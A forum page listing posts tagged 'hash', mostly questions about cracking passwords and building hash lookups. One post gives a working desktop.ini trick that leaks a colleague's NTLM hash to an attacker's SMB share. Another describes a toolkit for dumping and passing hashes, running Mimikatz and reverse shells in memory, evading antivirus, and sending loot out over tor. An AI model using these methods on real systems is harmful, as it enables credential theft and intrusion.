Showing results for tags 'hash'.

Found 15 results

  1. Hi all, I have myself a stack of various routers; an old BT Hub 2, Hub 6, an original TALKTALK router, some random router that looks like it's from the 90's (I forget the model), etc. People give me their old stuff to play with because they know I'm a massive nerd in my spare time. Pentesting the router password hash is easy enough with Aircrack, however I can't find much information about how one goes about capturing the admin password hash of a router (or plain text, if it's old and crappy like the random router I suspect may be!). So a basic question: What tools / methods are used for capturing admin router passwords? I plan on having a play with each router over the weekend. I did an online search for information, but the search just yielded lots of rubbish news articles with no actual useful information. Thanks guys.
  2. Decoy

    CUDA

    Pumped to build a new CUDA Cracking beast. Anyone have suggestions on cooling and power consumption? I've got 2 Nvidia GeForce GTX 1080 Founders Editions. Can I run both SLI on a 600w power supply or should I use the 750? I have the AMD FX Black Edition 8-Core processor as well.
  3. So yesterday I was battling to compile john but with that out of the way the rar file that I need to crack is doing some funny things. When running 'rar2john rarfile.rar > rarfile.hash' : rarfile.hash is bigger than the rarfile.rar. 6.8gb big. rarfile.rar contains a textfile with no data in (0kb) and another file (+-3gb). When running 'rar2john test.rar > test.hash': it produces one line with a hash that john can use and start cracking. test.hash contains a text file with no data in (0kb) and a text file with some data in. I thought it could be the 0kb text file seeing as the crc will always match when extracting it and any password will be able to extract it. But that does not seem to be it seeing as test.hash contains a single hash. Any ideas?
  4. After watching the recent episode of Hak5 (2102) on Youtube, I was wondering if this smb hash grab method can be done without the duck and with a normal USB stick. The answer is YES.

     Bytewolf @kingbytewolf

     -= HowTo do it =-

     • Grab any USB-Stick you have laying around
     • Create a Directory
     • Set the System attribute of this directory with attrib +s <dirname>
     • Create a file called desktop.ini in this directory with the following content

         [.ShellClassInfo]
         IconResource=\\<YourIP>\tmp\demo.ico
         IconFile=%SystemRoot%\system32\shell32.dll
         IconIndex=-235

     • Save the desktop.ini as Unicode or UTF-8 file
     • Set the attributes archive, hidden and system with attrib +a +h +s desktop.ini

     Preparation -> Done

     Put some RFCs in the directory. Fire up the smbserver and give the Stick to your colleague that really needs these RFCs. >:-D When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up.
  5. I have a bit of an odd question that I'm hoping someone here can point me in the right direction to figure out. I have been looking at a DVR which I purchased for the express purpose of poking around on. I was able to gain access to it via telnet, and found some interesting things. I found the password hashes for the web portal. The passwords themselves are hashed using an algorithm detected by JTR as "dahua". Outside of the source code for the JTR module located at http://fossies.org/linux/john/src/dahua_fmt_plug.c I cannot find any information about how this algorithm works. I spent several hours using my google-fu, but I haven't found anything yet. Here is what I have so far from reading the source code from above: The password is hashed using MD5, then compressed using the compress method included above. I don't know C well enough to be able to translate the rest of it, but that seems to be 99% of the work. I am getting hashes in the correct format using the code posted below, but they aren't correct. The code from the JTR module expects a 16 character hash, but MD5 returns a 32 character hash. I am quite rusty on C/C++, but I'm having a really hard time understanding the flow of the C program of the JTR module, particularly with pointers, and memory allocations. I know my python file has some errors in it, because it wasn't until I started writing this that I realized it was only checking the first 16 characters of the hash, not the full 32. It doesn't matter because the compressor as written only reduces the length by 2 anyway. dahua_hash.py
  6. Hi all, I can search this question on the internet and find the occasional useful byte of information, but most of it's a bit rubbish. Plus, I'd like to get some direct opinions. How would you personally go about setting up an affordable (say, less than $1500) Password hash cracking machine? For example; A computer packed with loads of cheap GPUs? But which ones? A Raspberry Pi cluster? Pay a service to do it for you? If so, what services are available? Other? Thanks. *edited* My spelling and grammar is always terrible because I type too fast.
  7. Hello, I want to test the strength of passwords. Assuming I have the password-cracking skills/tools of an average hacker, I want to turn the passwords into hashes and then try to crack them. This will give me a realistic picture of how strong they are. My question is: How do I turn the passwords into hashes? Does it matter what hashing algorithm I use? Thanks Nicholas
  8. I got a question, I'm trying to find more info on oclhashcat on drivers. I read that it's only available for nvidia, but I'm also trying to find drivers for or if anyone knows a way around for intel corporation mobile gm965/gl960.
  9. So I came up with a fun way to look up hashes. This is what I came up with. You can write the hash / plaintext pairs to individual files named for the hash but without a .txt file extension. So the file looks something like this.

         7dff371b14986821e1778231479afdf93e698fa0
         donkeypuncher

     And the filename is something like this:

         7dff371b14986821e1778231479afdf93e698fa0

     Here's a simple script that does this with sha1 hashes. This could pretty much be any hash type.

         #!/bin/bash
         # For every word in all.txt, write a file named for the word's SHA-1 hash.
         # The file holds the hash on the first line and the plaintext on the second.
         while IFS= read -r line
         do
             # echo appends a newline, so the hash covers the word plus "\n".
             # The sed strips everything up to "= " so both "(stdin)= " and
             # "SHA1(stdin)= " prefixes from openssl are removed.
             echo "$line" | openssl sha1 | sed -e 's/^.*= //' > temp1.txt
             echo "$line" > temp2.txt
             cat temp1.txt temp2.txt > temp3.txt
             donkey=$(head -n 1 temp3.txt)
             cat temp3.txt > "${donkey}"
             rm temp1.txt temp2.txt temp3.txt
         done < all.txt

     So basically you read through the wordlist and create a plaintext hash pair file for every plaintext in the list. An easy result. cd into the directory where you stored your hashes and cat out the hash. That simple, almost zero lookup time because you're just calling a file. Cooler still is you can upload them to a web server and you or anyone else can lookup hashes in a web browser. Just type in the address. yoursite/hashtype/hash If you get a hit it's your plaintext/hash pair. If it's not in your dictionary you get a 404 error. Or for extra added awesomeness you can create an HTML file for each with proper titles, tags, etc. Make a site map and pretty soon people will be able to lookup your hashes on Google. The cool thing here is you don't have to cat sort sed nawk grep split or generate new tables when you add words. You just move your new text hash pair files into the directory where you have them stored. You can skip or overwrite the existing and store the new files with little hassle. As an added bonus all of your friends can use your lookup files. The main problem I'm running into is hosting. I'm looking for a cheap host that will let me pretty much store unlimited files. If you are interested in working on something like this hit me up.
  10. Hey guys, I'm new to the hacking scene, been doing small tests like using metasploit, embedding meterpreter sessions and ssh'ing into machines for fun. But I've recently focused on Wi-Fi hacking, and been having a lot of fun with it. But however, I've come across this one hash that does not want to go down. No matter how many wordlists I throw at it, no matter how many different combination rules I throw at it, this hash REFUSES to bite the bullet and just give in. So, like any responsible penetration tester, I've decided to turn to the group's forum that got me interested in hacking in the first place. If anyone wants to try their hand at cracking it, I can send it via Skype, just ask for my contact info. Thanks!
  11. Hello, I'm trying to teach myself John the ripper and hashcat, I can't crack this at all. Tried 40 different wordlists (totaling 120GB), 20 different types of hashes. What am I doing wrong? I want someone to tell me how to properly crack this stuff, I don't want a simple hand out. The tutorials online and hash-cat site are not yielding any results. When I use hash id it says SHA-1. So I've done that and a number of other ones. I wonder if my wordlist. Can anyone help? Example set: d9081cc033ac2c19afe3ff8cf453946c12448422 f47f25c081e912826f3e14c1096e38d1f4dd2b43 afdc1c9439966fd0a314ee237c7338e871f59d7d ea4a493b6dd029de9f014848b68d7a55fad95437 2b62c635f72be4242fff4b1717504e5c7df80b3b ed879ab939c2d4e4afdf24f09f8946f2509366de f7a5d996f8221f4c5080f5326a915ce0a9b2d6e1 ef23bcefbc3cfe63d3bff54d9d606d3d2e4eea32 0febac796bfc2f86c74cc1c0875add0fe4e1c670 d1a0c716884144c47937a6fbee49390ac8fb33d1 Thanks
  12. After looking around, it seems this forum is pretty balanced morally but also innovative. So I decided to present this toolkit here. It started out as something simple but grew quickly. Let me know if it has any bugs and what you think of this, thoughts, opinions. I know there will be many typos. It's on GitHub as the repo boot2own under user xor-function. github(dot)com / xor-function / boot2own

      Apologies in advance if this is not the proper place for this.

      The contents of the ABOUT file

      SUMMARY

      B2O is a toolkit that generates a live OS from a crunchbang iso. From this live environment attacks are performed on the HDD to gain NTLM hashes to leverage in additional attacks against a network.

      Used crunchbang-11-20130506-i686.iso successfully to generate liveCD.
      Used Ubuntu Server x86 12.04 successfully to compile patched winexe.
      So use Ubuntu Server/Desktop x86 12.04 to compile binary for i686 crunchbang iso.
      Tested only on Hard drive with Windows 7 installed.

      SHELL SCRIPTS:

      b2o-compile.sh compiles the patch winexe binaries that allow hash passing

      b2o-isogen.sh uses a crunchbang iso to generate a remastered iso live OS (B2O) with the automated attack tools.

      b2o-pxe.sh Creates a pxe server that serves the remastered B2O live OS.

      b2o-listener.sh starts a meterpreter listener with the configured options to msfconsole, use with option 3 in the B2O live OS. (Requires Metasploit to be installed along with system_migrate.rb)

      b2o-autopwn.sh Attack engine, this script only runs in the live OS environment and provides a terminal menu with automated attack options.

      LIVE OS:

      The live OS chosen is CrunchBang Linux (I like it). The live filesystem is a squashfs filesystem. To remaster/mod it install squashfs-tools and genisoimage. To make a live USB use Unetbootin as the dd method fails.

      The expanded filesystem.squashfs was mounted and chrooted into to install the following packages: arp-scan lighttpd

      The core files that make the B2O live environment:

      root
      │
      └─ boot-2-own
         ├── boot2own-autopwn.sh
         ├── creddump
         │   ├── cachedump.py
         │   ├── CHANGELOG
         │   ├── COPYING
         │   ├── framework
         │   ├── lsadump.py
         │   ├── pwdump.py
         │   └── README
         ├── CREDITS-B2O
         └── pwinexe

      A terminator shell is loaded on boot by modding (/etc/skel/.config/openbox/autostart). The following line was appended to the autostart file:

          terminator --geometry=750x600 -e 'sudo /bin/bash -c /root/boot-2-own/b2o-autopwn.sh' &

      Once B2O is booted up on a domain computer, boot2own-autopwn.sh automatically mounts the hard drive and then reads the local hashes using creddump (written by Brendan Dolan-Gavitt).

      Booting a live OS on a computer can be done by a USB device but a more promising method is PXE. This is practical as it is simple to make an arm SoC (beagle bone/Rasp Pi) serve B2O over PXE. Also there is no need to leave any physical media attached to the used PC after the OS is loaded into RAM.

      Once booted it singles out the local administration user name and its corresponding NTLM hash and imports these as variables.

      Winexe is one of the only programs that enable cli interaction with Windows computers from Linux. Unlike Psexec it does not pass hashes. I used the samba-hashpass.patch from the smbexec project (Eric Milam & Martin Bos) and created a custom build/compile script to create a patched winexe binary (renamed to pwinexe to prevent confusion). Now the user and hash variables can then be passed to a function using pwinexe for additional machine access.

      The patched winexe also has the option to run as SYSTEM along with the option to uninstall itself from the machine upon command completion.

      POST EXPLOITATION

      Once the local admin username and hash are retrieved, boot2own-autopwn.sh acquires the ip address of other computers in the LAN using arp-scan. Once this is done you are presented with payload options for pwinexe.

      I chose powershell as the attacks can be completely in memory. This makes forensics and IR quite difficult especially since the attack platform itself is in memory (boot disk/PXE). This seems to be the least likely method to be caught by AV solutions. Although to reduce the chance of detection further one can try obfuscation, base64 encoding after adding unused random variables into the command string.

      The PS payloads used in B2O are Invoke-Mimikatz (written by Joe Bialek) and Invoke-Shellcode (written by Matthew Graeber); both are part of PowerSploit. More details about these scripts are located in the credits.

      To use these payloads without writing to disk, they must not be copied over prior to use. To ensure the powershell payloads are only run in memory I employed a lighttpd web server to host the payloads. Now they can be retrieved and copied to an expression or variable in memory before execution.

      The Auto-Off option: This is an optional feature that powers off the live OS Session after a selected payload finishes performing an execution run on the detected IPs in the LAN. This can be useful as one can turn off the monitor then leave and let the live OS session power itself off after it finishes its run.

      Invoke-Mimikatz reflectively loads Mimikatz in memory using powershell allowing the ability to acquire plain text passwords. The results are copied to the file /root/loot in the B2O live file system. To rsync/http-put-get through tor/i2p/etc.. this file to an external server just append the necessary code before the while loop ends at the bottom of boot2own-autopwn.sh.

      Invoke-Shellcode makes it possible to have reverse system shells connect to the specified IP or domain. It depends on MSF windows/meterpreter/reverse_https shell multi handler. It also depends on a modified version of smart_migrate, a Metasploit manage module. The modified module is named system_migrate.rb and is included in the folder. Its priority is to migrate out of powershell to an existing NT AUTHORITY/ SYSTEM process to maintain this permissions level. If it is not able to migrate out of powershell the patched winexe process will hang as powershell remains active.

      CAVEATS

      All of the following parameters must exist for success.

      • The victim network IT Department uses the local administrator user account on domain computers.
      • There is no hard disk encryption being used on the selected workstation.
      • Their workstations boot to PXE or their BIOS is unlocked.
  13. I have a pretty good idea how to write out hash/string pairs from a wordlist or with nested loops in C++. I'm fine with saving this stuff to a text file because I've been loading the stuff into MySQL tables so I can search for them easily. But I was curious about how one goes about creating rainbow tables. I want to write my own lookup tables mostly for a better understanding of how they work but I also want to customize the way the program looks up a hash. Can I just convert a delimited text file to .rt or .rtc? Basically I have figured out how to write out texts and hash but I want to take it a little further with a way to put them into a lookup table and index the memory locations into a hierarchical structure kinda like you would do with hyperlinks on a web site. So for example my hash is something like ZzaFDGwfhi423i9E7xz81a... it will start searching at ZzFD... instead of searching through the entire table starting at AAAA or whatever. Also do table lookups already do this? I would think someone else has already thought of something like this and implemented it. It seems like using the memory locations for certain strings as starting points would cut the search time exponentially. I really don't know that much about lookup tables to begin to know what the best way of going about this is. Can anybody point me in the way of some suggested reading on the subject? Here's some simplified examples of what I've been doing.

      // Simple example that converts a wordlist from plaintext to plaintext and hash pair tab delimited.
      #include <string>
      #include <iostream>
      #include <fstream>
      #include "md5.h"  // non-standard header; must supply md5(string)
      using namespace std;

      int main() {
          string line;
          ifstream infile("/path/file.txt");
          if (infile.is_open()) {
              // One output line per word: plaintext, tab (char(9)), MD5 hash
              while (getline(infile, line))
                  cout << line << char(9) << md5(line) << endl;
              infile.close();
          } else {
              cout << "Unable to open file";
          }
          return 0;
      }

      Might be wrong, I just grabbed a bunch of stuff and copy pasted from some of my source without including a lot.

      // Simple version of a string generator that uses nested loops to run through and echo out strings in order like brute force.
      #include <iostream>
      using namespace std;

      int main() {
          // 97..122 are the ASCII codes for 'a'..'z'
          for (int a = 97; a <= 122; a++) {
              for (int b = 97; b <= 122; b++) {
                  for (int c = 97; c <= 122; c++) {
                      for (int d = 97; d <= 122; d++) {
                          // only does four characters, if you want more make more loops.
                          cout << char(a) << char(b) << char(c) << char(d) << endl;
                      }
                  }
              }
          }
          return 0;
      }
  14. I recently released an attack on the iterative use of hashing functions. Here is a link to my blog post about it. http://ballastsec.blogspot.com/2012/07/transferable-state-attack-on-iterated.html This attack has proved to be faster than jtr at cracking Password Safe hashes, taking only 90% of the time it takes.
  15. So recently my buddy and me started poking holes in some password safe systems (like KeePass). I made a blog post about how most of these could easily be defeated by adding a WndProc listener to the clipboard, and watching for passwords as they get copied and pasted. That post is here: http://ballastsec.blogspot.com/2012/07/insecurity-in-password-management.html Not all of the password safe systems use this method, or have alternative methods as well. So the best way to attack these safes is to crack the safe. Currently, I have only implemented a safe cracker for Password Safe (http://passwordsafe.sourceforge.net/) after doing a light analysis then spending a lot of fun time making a dictionary cracker for it. Blog post about it here: http://ballastsec.blogspot.com/2012/07/auditing-of-password-safe-continues.html You can also find the source code that I've released so far here: https://github.com/bwall/SafeCracker/ and finally find the tarball of the latest version with a nice little Makefile here: https://github.com/downloads/bwall/SafeCracker/safe-cracker.tar.gz safe-cracker has currently only been tested in a Linux environment, if you really wanted to compile it on Windows, you would need the pthread library. If I were you though, I would wait until I finish implementing OpenCL into the cracker, as I will supply a compiled copy for Windows. What I would like to know is, what other password safe systems would you want audited? I want to add a few to this project, and hopefully start pushing development towards cracking more state of the art hashes.